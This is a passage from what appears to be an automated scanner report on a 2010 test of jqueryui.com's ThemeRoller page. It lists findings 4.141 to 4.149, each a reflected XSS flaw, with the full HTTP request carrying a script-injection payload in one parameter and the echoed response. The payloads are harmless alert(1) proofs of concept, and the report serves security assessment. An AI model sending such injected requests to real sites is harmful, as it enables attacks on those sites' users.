bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.pngbd035"><script>alert(1)</script>66642ae8c0e&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefau
...[SNIP]...

4.141. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9914"><script>alert(1)</script>6c32ca50cc1 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.pngd9914"><script>alert(1)</script>6c32ca50cc1&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.pngd9914"><script>alert(1)</script>6c32ca50cc1&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&
...[SNIP]...

4.142. http://jqueryui.com/themeroller/ [bgTextureError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58a46"><script>alert(1)</script>37189a3fb88 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png58a46"><script>alert(1)</script>37189a3fb88&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png58a46"><script>alert(1)</script>37189a3fb88&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=0
...[SNIP]...

4.143. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a34e4"><script>alert(1)</script>6f6deb6985f was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.pnga34e4"><script>alert(1)</script>6f6deb6985f&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Theme.css.php?ctl=themeroller&ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.pnga34e4"><script>alert(1)</script>6f6deb6985f&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcC
...[SNIP]...

4.144. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b375"><script>alert(1)</script>7b1d7aa2412 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png8b375"><script>alert(1)</script>7b1d7aa2412&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png8b375"><script>alert(1)</script>7b1d7aa2412&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a
...[SNIP]...

4.145. http://jqueryui.com/themeroller/ [bgTextureHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdc19"><script>alert(1)</script>ce6b6f37d34 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.pngfdc19"><script>alert(1)</script>ce6b6f37d34&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.pngfdc19"><script>alert(1)</script>ce6b6f37d34&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&icon
...[SNIP]...

4.146. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7a73"><script>alert(1)</script>ecfc02072aa was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.pngc7a73"><script>alert(1)</script>ecfc02072aa&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.pngc7a73"><script>alert(1)</script>ecfc02072aa&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRa
...[SNIP]...

4.147. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68388"><script>alert(1)</script>c2f5ccaa993 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png68388"><script>alert(1)</script>c2f5ccaa993&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Error=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png68388"><script>alert(1)</script>c2f5ccaa993&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px" type="text/css" media="all" />
...[SNIP]...

4.148. http://jqueryui.com/themeroller/ [borderColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e580"><script>alert(1)</script>1fa0fca1bf5 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd8508e580"><script>alert(1)</script>1fa0fca1bf5&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd8508e580"><script>alert(1)</script>1fa0fca1bf5&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef
...[SNIP]...

4.149. http://jqueryui.com/themeroller/ [borderColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95bac"><script>alert(1)</script>fd22abbdbef was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd95bac"><script>alert(1)</script>fd22abbdbef&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd95bac"><script>alert(1)</script>fd22abbdbef&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf
...[SNIP]...

